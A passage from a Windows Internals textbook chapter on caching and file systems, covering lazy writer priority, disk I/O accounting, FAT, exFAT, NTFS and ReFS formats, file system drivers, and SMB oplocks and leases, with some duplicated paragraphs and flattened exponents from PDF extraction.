the cache manager employs an algorithm to decide if the lazy writers threads should execute at low
priority. (For more information about thread priorities, refer to Chapter 4 of Part 1.) The cache manager
applies by-default low priority to the lazy writers if the following conditions are met (otherwise, the
cache manager still uses the normal priority):
I
The caller is not waiting for the current lazy scan to be finished.
I
The total size of the partition’s dirty pages is less than 32 MB.
If the two conditions are satisfied, the cache manager queues the work items for the lazy writers in
the low-priority queue. The lazy writers are started by a system worker thread, which executes at prior-
ity 6 – Lowest. Furthermore, the lazy writer set its I/O priority to Lowest just before emitting the actual
I/O to the correct file-system driver.
Dynamic memory
As seen in the previous paragraph, the dirty page threshold is calculated dynamically based on the
available amount of physical memory. The cache manager uses the threshold to decide when to
throttle incoming writes and whether to be more aggressive about writing behind.
Before the introduction of partitions, the calculation was made in the CcInitializeCacheManager
routine (by checking the MmNumberOfPhysicalPages global value), which was executed during the
kernel’s phase 1 initialization. Now, the cache manager Partition’s initialization function performs the
calculation based on the available physical memory pages that belong to the associated memory parti-
tion. (For further details about cache manager partitions, see the section “Memory partitions support,”
earlier in this chapter.) This is not enough, though, because Windows also supports the hot-addition
of physical memory, a feature that is deeply used by HyperV for supporting dynamic memory for
child VMs.
During memory manager phase 0 initialization, MiCreatePfnDatabase calculates the maximum
possible size of the PFN database. On 64-bit systems, the memory manager assumes that the maxi-
mum possible amount of installed physical memory is equal to all the addressable virtual memory
range (256 TB on non-LA57 systems, for example). The system asks the memory manager to reserve
the amount of virtual address space needed to store a PFN for each virtual page in the entire address
space. (The size of this hypothetical PFN database is around 64 GB.) MiCreateSparsePfnDatabase then
cycles between each valid physical memory range that Winload has detected and maps valid PFNs into
the database. The PFN database uses sparse memory. When the MiAddPhysicalMemory routines detect
new physical memory, it creates new PFNs simply by allocating new regions inside the PFN databases.
Dynamic Memory has already been described in Chapter 9, “Virtualization technologies”; further de-
tails are available there.
600
CHAPTER 11 Caching and file systems
The cache manager needs to detect the new hot-added or hot-removed memory and adapt to the
new system configuration, otherwise multiple problems could arise:
I
In cases where new memory has been hot-added, the cache manager might think that the system
has less memory, so its dirty pages threshold is lower than it should be. As a result, the cache man-
ager doesn’t cache as many dirty pages as it should, so it throttles writes much sooner.
I
If large portions of available memory are locked or aren’t available anymore, performing
cached I/O on the system could hurt the responsiveness of other applications (which, after the
hot-remove, will basically have no more memory).
To correctly deal with this situation, the cache manager doesn’t register a callback with the memory
manager but implements an adaptive correction in the lazy writer scan (LWS) thread. Other than
scanning the list of shared cache map and deciding which dirty page to write, the LWS thread has the
ability to change the dirty pages threshold depending on foreground rate, its write rate, and available
memory. The LWS maintains a history of average available physical pages and dirty pages that belong
to the partition. Every second, the LWS thread updates these lists and calculates aggregate values.
Using the aggregate values, the LWS is able to respond to memory size variations, absorbing the spikes
and gradually modifying the top and bottom thresholds.
Cache manager disk I/O accounting
Before Windows 8.1, it wasn’t possible to precisely determine the total amount of I/O performed by a
single process. The reasons behind this were multiple:
I
Lazy writes and read-aheads don’t happen in the context of the process/thread that caused the
I/O. The cache manager writes out the data lazily, completing the write in a different context
(usually the System context) of the thread that originally wrote the file. (The actual I/O can even
happen after the process has terminated.) Likewise, the cache manager can choose to read-
ahead, bringing in more data from the file than the process requested.
I
Asynchronous I/O is still managed by the cache manager, but there are cases in which the cache
manager is not involved at all, like for non-cached I/Os.
I
Some specialized applications can emit low-level disk I/O using a lower-level driver in the disk stack.
Windows stores a pointer to the thread that emitted the I/O in the tail of the IRP. This thread is not
always the one that originally started the I/O request. As a result, a lot of times the I/O accounting was
wrongly associated with the System process. Windows 8.1 resolved the problem by introducing the
PsUpdateDiskCounters API, used by both the cache manager and file system drivers, which need to
tightly cooperate. The function stores the total number of bytes read and written and the number of
I/O operations in the core EPROCESS data structure that is used by the NT kernel to describe a process.
(You can read more details in Chapter 3 of Part 1.)
The cache manager updates the process disk counters (by calling the PsUpdateDiskCounters func-
tion) while performing cached reads and writes (through all of its exposed file system interfaces) and
while emitting read-aheads I/O (through CcScheduleReadAheadEx exported API). NTFS and ReFS file
systems drivers call the PsUpdateDiskCounters while performing non-cached and paging I/O.
CHAPTER 11
Caching and file systems
601
Like CcScheduleReadAheadEx, multiple cache manager APIs have been extended to accept a pointer
to the thread that has emitted the I/O and should be charged for it (CcCopyReadEx and CcCopyWriteEx
are good examples). In this way, updated file system drivers can even control which thread to charge in
case of asynchronous I/O.
Other than per-process counters, the cache manager also maintains a Global Disk I/O counter,
which globally keeps track of all the I/O that has been issued by file systems to the storage stack. (The
counter is updated every time a non-cached and paging I/O is emitted through file system drivers.)
Thus, this global counter, when subtracted from the total I/O emitted to a particular disk device (a value
that an application can obtain by using the IOCTL_DISK_PERFORMANCE control code), represents the
I/O that could not be attributed to any particular process (paging I/O emitted by the Modified Page
Writer for example, or I/O performed internally by Mini-filter drivers).
The new per-process disk counters are exposed through the NtQuerySystemInformation API using
the SystemProcessInformation information class. This is the method that diagnostics tools like Task
Manager or Process Explorer use for precisely querying the I/O numbers related to the processes cur-
rently running in the system.
EXPERIMENT: Counting disk I/Os
You can see a precise counting of the total system I/Os by using the different counters exposed
by the Performance Monitor. Open Performance Monitor and add the FileSystem Bytes Read
and FileSystem Bytes Written counters, which are available in the FileSystem Disk Activity group.
Furthermore, for this experiment you need to add the per-process disk I/O counters that are
available in the Process group, named IO Read Bytes/sec and IO Write Bytes/sec. When you
add these last two counters, make sure that you select the Explorer process in the Instances Of
Selected Object box.
When you start to copy a big file, you see the counters belonging to Explorer processes
increasing until they reach the counters showed in the global file System Disk activity.
EXPERIMENT: Counting disk I/Os
You can see a precise counting of the total system I/Os by using the different counters exposed
by the Performance Monitor. Open Performance Monitor and add the FileSystem Bytes Read
and FileSystem Bytes Written counters, which are available in the FileSystem Disk Activity group.
Furthermore, for this experiment you need to add the per-process disk I/O counters that are
available in the Process group, named IO Read Bytes/sec and IO Write Bytes/sec. When you
add these last two counters, make sure that you select the Explorer process in the Instances Of
Selected Object box.
When you start to copy a big file, you see the counters belonging to Explorer processes
increasing until they reach the counters showed in the global file System Disk activity.
602
CHAPTER 11
Caching and file systems
File systems
In this section, we present an overview of the supported file system formats supported by Windows.
We then describe the types of file system drivers and their basic operation, including how they interact
with other system components, such as the memory manager and the cache manager. Following that,
we describe in detail the functionality and the data structures of the two most important file systems:
NTFS and ReFS. We start by analyzing their internal architectures and then focus on the on-disk layout
of the two file systems and their advanced features, such as compression, recoverability, encryption,
tiering support, file-snapshot, and so on.
Windows file system formats
Windows includes support for the following file system formats:
I
CDFS
I
UDF
I
FAT12, FAT16, and FAT32
I
exFAT
I
NTFS
I
ReFS
Each of these formats is best suited for certain environments, as you’ll see in the following sections.
CDFS
CDFS (%SystemRoot%\System32\Drivers\Cdfs.sys), or CD-ROM file system, is a read-only file system
driver that supports a superset of the ISO-9660 format as well as a superset of the Joliet disk format.
Although the ISO-9660 format is relatively simple and has limitations such as ASCII uppercase names
with a maximum length of 32 characters, Joliet is more flexible and supports Unicode names of arbi-
trary length. If structures for both formats are present on a disk (to offer maximum compatibility), CDFS
uses the Joliet format. CDFS has a couple of restrictions:
I
A maximum file size of 4 GB
I
A maximum of 65,535 directories
CDFS is considered a legacy format because the industry has adopted the Universal Disk Format
(UDF) as the standard for optical media.
CHAPTER 11
Caching and file systems
603
UDF
The Windows Universal Disk Format (UDF) file system implementation is OSTA (Optical Storage
Technology Association) UDF-compliant. (UDF is a subset of the ISO-13346 format with extensions for
formats such as CD-R and DVD-R/RW.) OSTA defined UDF in 1995 as a format to replace the ISO-9660
format for magneto-optical storage media, mainly DVD-ROM. UDF is included in the DVD specification
and is more flexible than CDFS. The UDF file system format has the following traits:
I
Directory and file names can be 254 ASCII or 127 Unicode characters long.
I
Files can be sparse. (Sparse files are defined later in this chapter, in the “Compression and sparse
files” section.)
I
File sizes are specified with 64 bits.
I
Support for access control lists (ACLs).
I
Support for alternate data streams.
The UDF driver supports UDF versions up to 2.60. The UDF format was designed with rewritable me-
dia in mind. The Windows UDF driver (%SystemRoot%\System32\Drivers\Udfs.sys) provides read-write
support for Blu-ray, DVD-RAM, CD-R/RW, and DVD+-R/RW drives when using UDF 2.50 and read-only
support when using UDF 2.60. However, Windows does not implement support for certain UDF fea-
tures such as named streams and access control lists.
FAT12, FAT16, and FAT32
Windows supports the FAT file system primarily for compatibility with other operating systems in mul-
tiboot systems, and as a format for flash drives or memory cards. The Windows FAT file system driver is
implemented in %SystemRoot%\System32\Drivers\Fastfat.sys.
The name of each FAT format includes a number that indicates the number of bits that the particular
format uses to identify clusters on a disk. FAT12’s 12-bit cluster identifier limits a partition to storing a
maximum of 212 (4,096) clusters. Windows permits cluster sizes from 512 bytes to 8 KB, which limits a
FAT12 volume size to 32 MB.
Note All FAT file system types reserve the first 2 clusters and the last 16 clusters of a volume,
so the number of usable clusters for a FAT12 volume, for instance, is slightly less than 4,096.
FAT16, with a 16-bit cluster identifier, can address 216 (65,536) clusters. On Windows, FAT16 cluster
sizes range from 512 bytes (the sector size) to 64 KB (on disks with a 512-byte sector size), which limits
FAT16 volume sizes to 4 GB. Disks with a sector size of 4,096 bytes allow for clusters of 256 KB. The clus-
ter size Windows uses depends on the size of a volume. The various sizes are listed in Table 11-2. If you
format a volume that is less than 16 MB as FAT by using the format command or the Disk Management
snap-in, Windows uses the FAT12 format instead of FAT16.
604
CHAPTER 11
Caching and file systems
TABLE 11-2 Default FAT16 cluster sizes in Windows
Volume Size
Default Cluster Size
<8 MB
Not supported
8 MB–32 MB
512 bytes
32 MB–64 MB
1 KB
64 MB–128 MB
2 KB
128 MB–256 MB
4 KB
256 MB–512 MB
8 KB
512 MB–1,024 MB
16 KB
1 GB–2 GB
32 KB
2 GB–4 GB
64 KB
>16 GB
Not supported
A FAT volume is divided into several regions, which are shown in Figure 11-14. The file allocation table,
which gives the FAT file system format its name, has one entry for each cluster on a volume. Because
the file allocation table is critical to the successful interpretation of a volume’s contents, the FAT format
maintains two copies of the table so that if a file system driver or consistency-checking program (such as
Chkdsk) can’t access one (because of a bad disk sector, for example), it can read from the other.
Boot
sector
File allocation
table 1
File allocation
table 2
(duplicate)
Root
directory
Other directories and all files
FIGURE 11-14 FAT format organization.
Entries in the file allocation table define file-allocation chains (shown in Figure 11-15) for files and
directories, where the links in the chain are indexes to the next cluster of a file’s data. A file’s directory
entry stores the starting cluster of the file. The last entry of the file’s allocation chain is the reserved
value of 0xFFFF for FAT16 and 0xFFF for FAT12. The FAT entries for unused clusters have a value of 0. You
can see in Figure 11-15 that FILE1 is assigned clusters 2, 3, and 4; FILE2 is fragmented and uses clusters 5,
6, and 8; and FILE3 uses only cluster 7. Reading a file from a FAT volume can involve reading large por-
tions of a file allocation table to traverse the file’s allocation chains.
FILE1
0002
0003
0004
0006
0008
FFFF
FFFF
0000
FFFF
FILE2
File directory entries
2
3
4
5
6
7
8
9
0005
FILE3
0007
FIGURE 11-15 Sample FAT file-allocation chains.
CHAPTER 11
Caching and file systems
605
The root directory of FAT12 and FAT16 volumes is preassigned enough space at the start of a volume to
store 256 directory entries, which places an upper limit on the number of files and directories that can be
stored in the root directory. (There’s no preassigned space or size limit on FAT32 root directories.) A FAT
directory entry is 32 bytes and stores a file’s name, size, starting cluster, and time stamp (last-accessed,
created, and so on) information. If a file has a name that is Unicode or that doesn’t follow the MS-DOS 8.3
naming convention, additional directory entries are allocated to store the long file name. The supplemen-
tary entries precede the file’s main entry. Figure 11-16 shows a sample directory entry for a file named “The
quick brown fox.” The system has created a THEQUI1.FOX 8.3 representation of the name (that is, you don’t
see a “.” in the directory entry because it is assumed to come after the eighth character) and used two more
directory entries to store the Unicode long file name. Each row in the figure is made up of 16 bytes.
Second (and last) long entry
Short entry
First long entry
0x42
w
n
.
f
o
0x0F
0x00
x
Check
sum
0x0000
0xFFFF
0xFFFF
0xFFFF
0xFFFF
0x0000
0xFFFF
0xFFFF
0x01
T
h
e
q
0x0F 0x00
u
Check
sum
i
c
k
b
0x0000
o
r
T
H
E
Q
U
I
˜
1
F
O
X
0x20
NT
Create time
Create date
Last access
date
0x0000
Last modi-
fied time
Last modi-
fied date
First cluster
File size
FIGURE 11.16 FAT directory entry.
FAT32 uses 32-bit cluster identifiers but reserves the high 4 bits, so in effect it has 28-bit cluster
identifiers. Because FAT32 cluster sizes can be as large as 64 KB, FAT32 has a theoretical ability to ad-
dress 16-terabyte (TB) volumes. Although Windows works with existing FAT32 volumes of larger sizes
(created in other operating systems), it limits new FAT32 volumes to a maximum of 32 GB. FAT32’s
higher potential cluster numbers let it manage disks more efficiently than FAT16; it can handle up to
128-GB volumes with 512-byte clusters. Table 11-3 shows default cluster sizes for FAT32 volumes.
TABLE 11-3 Default cluster sizes for FAT32 volumes
Partition Size
Default Cluster Size
<32 MB
Not supported
32 MB–64 MB
512 bytes
64 MB–128 MB
1 KB
128 MB–256 MB
2 KB
256 MB–8 GB
4 KB
8 GB–16 GB
8 KB
16 GB–32 GB
16 KB
>32 GB
Not supported
606
CHAPTER 11
Caching and file systems
Besides the higher limit on cluster numbers, other advantages FAT32 has over FAT12 and FAT16
include the fact that the FAT32 root directory isn’t stored at a predefined location on the volume, the
root directory doesn’t have an upper limit on its size, and FAT32 stores a second copy of the boot sector
for reliability. A limitation FAT32 shares with FAT16 is that the maximum file size is 4 GB because direc-
tories store file sizes as 32-bit values.
exFAT
Designed by Microsoft, the Extended File Allocation Table file system (exFAT, also called FAT64) is an
improvement over the traditional FAT file systems and is specifically designed for flash drives. The main
goal of exFAT is to provide some of the advanced functionality offered by NTFS without the metadata
structure overhead and metadata logging that create write patterns not suited for many flash media
devices. Table 11-4 lists the default cluster sizes for exFAT.
As the FAT64 name implies, the file size limit is increased to 264, allowing files up to 16 exabytes. This
change is also matched by an increase in the maximum cluster size, which is currently implemented as 32
MB but can be as large as 2255 sectors. exFAT also adds a bitmap that tracks free clusters, which improves
the performance of allocation and deletion operations. Finally, exFAT allows more than 1,000 files in a
single directory. These characteristics result in increased scalability and support for large disk sizes.
TABLE 11-4 Default cluster sizes for exFAT volumes, 512-byte sector
Volume Size
Default Cluster Size
< 256 MB
4 KB
256 MB–32 GB
32 KB
32 GB–512 GB
128 KB
512 GB–1 TB
256 KB
1 TB–2 TB
512 KB
2 TB–4 TB
1 MB
4 TB–8 TB
2 MB
8 TB–16 TB
4 MB
16 TB–32 TB
8 MB
32 TB–64 TB
16 MB
> 64 TB
32 MB
Additionally, exFAT implements certain features previously available only in NTFS, such as sup-
port for access control lists (ACLs) and transactions (called Transaction-Safe FAT, or TFAT). While
the Windows Embedded CE implementation of exFAT includes these features, the version of exFAT
in Windows does not.
Note ReadyBoost (described in Chapter 5 of Part 1, “Memory Management”) can work with
exFAT-formatted flash drives to support cache files much larger than 4 GB.
CHAPTER 11
Caching and file systems
607
NTFS
As noted at the beginning of the chapter, the NTFS file system is one of the native file system formats
of Windows. NTFS uses 64-bit cluster numbers. This capacity gives NTFS the ability to address volumes
of up to 16 exaclusters; however, Windows limits the size of an NTFS volume to that addressable with
32-bit clusters, which is slightly less than 8 petabytes (using 2 MB clusters). Table 11-5 shows the default
cluster sizes for NTFS volumes. (You can override the default when you format an NTFS volume.) NTFS
also supports 232–1 files per volume. The NTFS format allows for files that are 16 exabytes in size, but the
implementation limits the maximum file size to 16 TB.
TABLE 11-5 Default cluster sizes for NTFS volumes
Volume Size
Default Cluster Size
<7 MB
Not supported
7 MB–16 TB
4 KB
16 TB–32 TB
8 KB
32 TB–64 TB
16 KB
64 TB–128 TB
32 KB
128 TB–256 TB
64 KB
256 TB–512 TB
128 KB
512 TB–1024 TB
256 KB
1 PB–2 PB
512 KB
2 PB–4 PB
1 MB
4 PB–8 PB
2 MB
NTFS includes a number of advanced features, such as file and directory security, alternate data
streams, disk quotas, sparse files, file compression, symbolic (soft) and hard links, support for transac-
tional semantics, junction points, and encryption. One of its most significant features is recoverability.
If a system is halted unexpectedly, the metadata of a FAT volume can be left in an inconsistent state,
leading to the corruption of large amounts of file and directory data. NTFS logs changes to metadata
in a transactional manner so that file system structures can be repaired to a consistent state with no
loss of file or directory structure information. (File data can be lost unless the user is using TxF, which is
covered later in this chapter.) Additionally, the NTFS driver in Windows also implements self-healing, a
mechanism through which it makes most minor repairs to corruption of file system on-disk structures
while Windows is running and without requiring a reboot.
Note At the time of this writing, the common physical sector size of disk devices is 4 KB. Even
for these disk devices, for compatibility reasons, the storage stack exposes to file system driv-
ers a logical sector size of 512 bytes. The calculation performed by the NTFS driver to deter-
mine the correct size of the cluster uses logical sector sizes rather than the actual physical size.
608
CHAPTER 11
Caching and file systems
Starting with Windows 10, NTFS supports DAX volumes natively. (DAX volumes are discussed later
in this chapter, in the “DAX volumes” section.) The NTFS file system driver also supports I/O to this kind
of volume using large pages. Mapping a file that resides on a DAX volume using large pages is possible
in two ways: NTFS can automatically align the file to a 2-MB cluster boundary, or the volume can be
formatted using a 2-MB cluster size.
ReFS
The Resilient File System (ReFS) is another file system that Windows supports natively. It has been
designed primarily for large storage servers with the goal to overcome some limitations of NTFS, like
its lack of online self-healing or volume repair or the nonsupport for file snapshots. ReFS is a “write-
to-new” file system, which means that volume metadata is always updated by writing new data to
the underlying medium and by marking the old metadata as deleted. The lower level of the ReFS file
system (which understands the on-disk data structure) uses an object store library, called Minstore,
that provides a key-value table interface to its callers. Minstore is similar to a modern database
engine, is portable, and uses different data structures and algorithms compared to NTFS. (Minstore
uses B+ trees.)
One of the important design goals of ReFS was to be able to support huge volumes (that could have
been created by Storage Spaces). Like NTFS, ReFS uses 64-bit cluster numbers and can address volumes
of up 16 exaclusters. ReFS has no limitation on the size of the addressable values, so, theoretically, ReFS
is able to manage volumes of up to 1 yottabyte (using 64 KB cluster sizes).
Unlike NTFS, Minstore doesn’t need a central location to store its own metadata on the volume
(although the object table could be considered somewhat centralized) and has no limitations on
addressable values, so there is no need to support many different sized clusters. ReFS supports only
4 KB and 64 KB cluster sizes. ReFS, at the time of this writing, does not support DAX volumes.
We describe NTFS and ReFS data structures and their advanced features in detail later in this chapter.
File system driver architecture
File system drivers (FSDs) manage file system formats. Although FSDs run in kernel mode, they differ
in a number of ways from standard kernel-mode drivers. Perhaps most significant, they must register
as an FSD with the I/O manager, and they interact more extensively with the memory manager. For
enhanced performance, file system drivers also usually rely on the services of the cache manager. Thus,
they use a superset of the exported Ntoskrnl.exe functions that standard drivers use. Just as for stan-
dard kernel-mode drivers, you must have the Windows Driver Kit (WDK) to build file system drivers.
(See Chapter 1, “Concepts and Tools,” in Part 1 and http://www.microsoft.com/whdc/devtools/wdk for
more information on the WDK.)
Windows has two different types of FSDs:
I
Local FSDs manage volumes directly connected to the computer.
I
Network FSDs allow users to access data volumes connected to remote computers.
CHAPTER 11
Caching and file systems
609
Local FSDs
Local FSDs include Ntfs.sys, Refs.sys, Refsv1.sys, Fastfat.sys, Exfat.sys, Udfs.sys, Cdfs.sys, and the RAW
FSD (integrated in Ntoskrnl.exe). Figure 11-17 shows a simplified view of how local FSDs interact with the
I/O manager and storage device drivers. A local FSD is responsible for registering with the I/O manager.
Once the FSD is registered, the I/O manager can call on it to perform volume recognition when appli-
cations or the system initially access the volumes. Volume recognition involves an examination of a vol-
ume’s boot sector and often, as a consistency check, the file system metadata. If none of the registered
file systems recognizes the volume, the system assigns the RAW file system driver to the volume and
then displays a dialog box to the user asking if the volume should be formatted. If the user chooses not
to format the volume, the RAW file system driver provides access to the volume, but only at the sector
level—in other words, the user can only read or write complete sectors.
The goal of file system recognition is to allow the system to have an additional option for a valid
but unrecognized file system other than RAW. To achieve this, the system defines a fixed data structure
type (FILE_SYSTEM_RECOGNITION_STRUCTURE) that is written to the first sector on the volume. This
data structure, if present, would be recognized by the operating system, which would then notify the
user that the volume contains a valid but unrecognized file system. The system will still load the RAW
file system on the volume, but it will not prompt the user to format the volume. A user application or
kernel-mode driver might ask for a copy of the FILE_SYSTEM_RECOGNITION_STRUCTURE by using the
new file system I/O control code FSCTL_QUERY_FILE_SYSTEM_RECOGNITION.
The first sector of every Windows-supported file system format is reserved as the volume’s boot
sector. A boot sector contains enough information so that a local FSD can both identify the volume on
which the sector resides as containing a format that the FSD manages and locate any other metadata
necessary to identify where metadata is stored on the volume.
When a local FSD (shown in Figure 11-17) recognizes a volume, it creates a device object that rep-
resents the mounted file system format. The I/O manager makes a connection through the volume
parameter block (VPB) between the volume’s device object (which is created by a storage device driver)
and the device object that the FSD created. The VPB’s connection results in the I/O manager redirecting
I/O requests targeted at the volume device object to the FSD device object.
Application
Application
Logical
volume
(partition)
User mode
Kernel mode
I/O manager
File system driver
Storage device drivers
FIGURE 11-17 Local FSD.
610
CHAPTER 11
Caching and file systems
To improve performance, local FSDs usually use the cache manager to cache file system data, in-
cluding metadata. FSDs also integrate with the memory manager so that mapped files are implement-
ed correctly. For example, FSDs must query the memory manager whenever an application attempts to
truncate a file to verify that no processes have mapped the part of the file beyond the truncation point.
(See Chapter 5 of Part 1 for more information on the memory manager.) Windows doesn’t permit file
data that is mapped by an application to be deleted either through truncation or file deletion.
Local FSDs also support file system dismount operations, which permit the system to disconnect the
FSD from the volume object. A dismount occurs whenever an application requires raw access to the
on-disk contents of a volume or the media associated with a volume is changed. The first time an ap-
plication accesses the media after a dismount, the I/O manager reinitiates a volume mount operation
for the media.
Remote FSDs
Each remote FSD consists of two components: a client and a server. A client-side remote FSD allows
applications to access remote files and directories. The client FSD component accepts I/O requests
from applications and translates them into network file system protocol commands (such as SMB)
that the FSD sends across the network to a server-side component, which is a remote FSD. A server-
side FSD listens for commands coming from a network connection and fulfills them by issuing I/O
requests to the local FSD that manages the volume on which the file or directory that the command
is intended for resides.
Windows includes a client-side remote FSD named LANMan Redirector (usually referred to as
just the redirector) and a server-side remote FSD named LANMan Server (%SystemRoot%\System32
\Drivers\Srv2.sys). Figure 11-18 shows the relationship between a client accessing files remotely from a
server through the redirector and server FSDs.
Disk
Client
Server
User mode
Kernel mode
Protocol driver
(WSK transport)
Protocol driver
(WSK transport)
Local FSD
(NTFS, FAT)
File data
Network
Client
application
Kernel32.dll
Ntdll.dll
Cache
manager
Server
FSD
User mode
Kernel mode
Cache
manager
Redirector
FSD
FIGURE 11-18 Common Internet File System file sharing.
CHAPTER 11
Caching and file systems
611
Windows relies on the Common Internet File System (CIFS) protocol to format messages exchanged
between the redirector and the server. CIFS is a version of Microsoft’s Server Message Block (SMB)
protocol. (For more information on SMB, go to https://docs.microsoft.com/en-us/windows/win32/fileio
/microsoft-smb-protocol-and-cifs-protocol-overview.)
Like local FSDs, client-side remote FSDs usually use cache manager services to locally cache file data
belonging to remote files and directories, and in such cases both must implement a distributed locking
mechanism on the client as well as the server. SMB client-side remote FSDs implement a distributed cache
coherency protocol, called oplock (opportunistic locking), so that the data an application sees when it
accesses a remote file is the same as the data applications running on other computers that are accessing
the same file see. Third-party file systems may choose to use the oplock protocol, or they may implement
their own protocol. Although server-side remote FSDs participate in maintaining cache coherency across
their clients, they don’t cache data from the local FSDs because local FSDs cache their own data.
It is fundamental that whenever a resource can be shared between multiple, simultaneous acces-
sors, a serialization mechanism must be provided to arbitrate writes to that resource to ensure that only
one accessor is writing to the resource at any given time. Without this mechanism, the resource may
be corrupted. The locking mechanisms used by all file servers implementing the SMB protocol are the
oplock and the lease. Which mechanism is used depends on the capabilities of both the server and the
client, with the lease being the preferred mechanism.
Oplocks The oplock functionality is implemented in the file system run-time library (FsRtlXxx
functions) and may be used by any file system driver. The client of a remote file server uses an oplock to
dynamically determine which client-side caching strategy to use to minimize network traffic. An oplock
is requested on a file residing on a share, by the file system driver or redirector, on behalf of an applica-
tion when it attempts to open a file. The granting of an oplock allows the client to cache the file rather
than send every read or write to the file server across the network. For example, a client could open a
file for exclusive access, allowing the client to cache all reads and writes to the file, and then copy the
updates to the file server when the file is closed. In contrast, if the server does not grant an oplock to a
client, all reads and writes must be sent to the server.
Once an oplock has been granted, a client may then start caching the file, with the type of oplock
determining what type of caching is allowed. An oplock is not necessarily held until a client is finished
with the file, and it may be broken at any time if the server receives an operation that is incompatible with
the existing granted locks. This implies that the client must be able to quickly react to the break of the
oplock and change its caching strategy dynamically.
Prior to SMB 2.1, there were four types of oplocks:
I
Level 1, exclusive access This lock allows a client to open a file for exclusive access. The client
may perform read-ahead buffering and read or write caching.
I
Level 2, shared access This lock allows multiple, simultaneous readers of a file and no writers.
The client may perform read-ahead buffering and read caching of file data and attributes. A
write to the file will cause the holders of the lock to be notified that the lock has been broken.
612
CHAPTER 11
Caching and file systems
I
Batch, exclusive access This lock takes its name from the locking used when processing
batch (.bat) files, which are opened and closed to process each line within the file. The client
may keep a file open on the server, even though the application has (perhaps temporarily)
closed the file. This lock supports read, write, and handle caching.
I
Filter, exclusive access This lock provides applications and file system filters with a mecha-
nism to give up the lock when other clients try to access the same file, but unlike a Level 2 lock,
the file cannot be opened for delete access, and the other client will not receive a sharing viola-
tion. This lock supports read and write caching.
In the simplest terms, if multiple client systems are all caching the same file shared by a server,
then as long as every application accessing the file (from any client or the server) tries only to read the
file, those reads can be satisfied from each system’s local cache. This drastically reduces the network
traffic because the contents of the file aren’t sent to each system from the server. Locking information
must still be exchanged between the client systems and the server, but this requires very low network
bandwidth. However, if even one of the clients opens the file for read and write access (or exclusive
write), then none of the clients can use their local caches and all I/O to the file must go immediately
to the server, even if the file is never written. (Lock modes are based upon how the file is opened, not
individual I/O requests.)
An example, shown in Figure 11-19, will help illustrate oplock operation. The server automatically
grants a Level 1 oplock to the first client to open a server file for access. The redirector on the client
caches the file data for both reads and writes in the file cache of the client machine. If a second client
opens the file, it too requests a Level 1 oplock. However, because there are now two clients accessing
the same file, the server must take steps to present a consistent view of the file’s data to both clients.
If the first client has written to the file, as is the case in Figure 11-19, the server revokes its oplock and
grants neither client an oplock. When the first client’s oplock is revoked, or broken, the client flushes
any data it has cached for the file back to the server.
Time
File open
Cached read(s)
Cached write(s)
Flushes cached
modified data
Noncached read(s)
Noncached write(s)
Client 1
Client 2
Grant Level 1
oplock to Client 1
File open
Oplock request
Oplock
request
Level 1 grant
Oplock break
to none
Data flush
No oplock
granted
Noncached read(s)
Noncached write(s)
Break Client 1
to no oplock
Do not grant
Client 2 oplock
Server
FIGURE 11-19 Oplock example.
CHAPTER 11
Caching and file systems
613
If the first client hadn’t written to the file, the first client’s oplock would have been broken to a
Level 2 oplock, which is the same type of oplock the server would grant to the second client. Now both
clients can cache reads, but if either writes to the file, the server revokes their oplocks so that non-
cached operation commences. Once oplocks are broken, they aren’t granted again for the same open
instance of a file. However, if a client closes a file and then reopens it, the server reassesses what level of
oplock to grant the client based on which other clients have the file open and whether at least one of
them has written to the file.
EXPERIMENT: Viewing the list of registered file systems
When the I/O manager loads a device driver into memory, it typically names the driver object
it creates to represent the driver so that it’s placed in the \Driver object manager directory. The
driver objects for any driver the I/O manager loads that have a Type attribute value of SERVICE_
FILE_SYSTEM_DRIVER (2) are placed in the \FileSystem directory by the I/O manager. Thus, using
a tool such as WinObj (from Sysinternals), you can see the file systems that have registered on a
system, as shown in the following screenshot. Note that file system filter drivers will also show up
in this list. Filter drivers are described later in this section.
Another way to see registered file systems is to run the System Information viewer. Run
Msinfo32 from the Start menu’s Run dialog box and select System Drivers under Software
Environment. Sort the list of drivers by clicking the Type column, and drivers with a Type attri-
bute of SERVICE_FILE_SYSTEM_DRIVER group together.
EXPERIMENT: Viewing the list of registered file systems
When the I/O manager loads a device driver into memory, it typically names the driver object
it creates to represent the driver so that it’s placed in the \Driver object manager directory. The
driver objects for any driver the I/O manager loads that have a Type attribute value of SERVICE_
FILE_SYSTEM_DRIVER (2) are placed in the \FileSystem directory by the I/O manager. Thus, using
a tool such as WinObj (from Sysinternals), you can see the file systems that have registered on a
system, as shown in the following screenshot. Note that file system filter drivers will also show up
in this list. Filter drivers are described later in this section.
Another way to see registered file systems is to run the System Information viewer. Run
Msinfo32 from the Start menu’s Run dialog box and select System Drivers under Software
Environment. Sort the list of drivers by clicking the Type column, and drivers with a Type attri-
bute of SERVICE_FILE_SYSTEM_DRIVER group together.
614
CHAPTER 11
Caching and file systems
Note that just because a driver registers as a file system driver type doesn’t mean that it is
a local or remote FSD. For example, Npfs (Named Pipe File System) is a driver that implements
named pipes through a file system-like private namespace. As mentioned previously, this list will
also include file system filter drivers.
Leases
Prior to SMB 2.1, the SMB protocol assumed an error-free network connection between
the client and the server and did not tolerate network disconnections caused by transient network
failures, server reboot, or cluster failovers. When a network disconnect event was received by the cli-
ent, it orphaned all handles opened to the affected server(s), and all subsequent I/O operations on the
orphaned handles were failed. Similarly, the server would release all opened handles and resources
associated with the disconnected user session. This behavior resulted in applications losing state and in
unnecessary network traffic.
Note that just because a driver registers as a file system driver type doesn’t mean that it is
a local or remote FSD. For example, Npfs (Named Pipe File System) is a driver that implements
named pipes through a file system-like private namespace. As mentioned previously, this list will
also include file system filter drivers.
CHAPTER 11
Caching and file systems
615
In SMB 2.1, the concept of a lease is introduced as a new type of client caching mechanism, similar to
an oplock. The purpose of a lease and an oplock is the same, but a lease provides greater flexibility and
much better performance.
I
Read (R), shared access
Allows multiple simultaneous readers of a file, and no writers. This
lease allows the client to perform read-ahead buffering and read caching.
I
Read-Handle (RH), shared access
This is similar to the Level 2 oplock, with the added
benefit of allowing the client to keep a file open on the server even though the accessor on the
client has closed the file. (The cache manager will lazily flush the unwritten data and purge the
unmodified cache pages based on memory availability.) This is superior to a Level 2 oplock be-
cause the lease does not need to be broken between opens and closes of the file handle. (In this
respect, it provides semantics similar to the Batch oplock.) This type of lease is especially useful
for files that are repeatedly opened and closed because the cache is not invalidated when the
file is closed and refilled when the file is opened again, providing a big improvement in perfor-
mance for complex I/O intensive applications.
I
Read-Write (RW), exclusive access
This lease allows a client to open a file for exclusive ac-
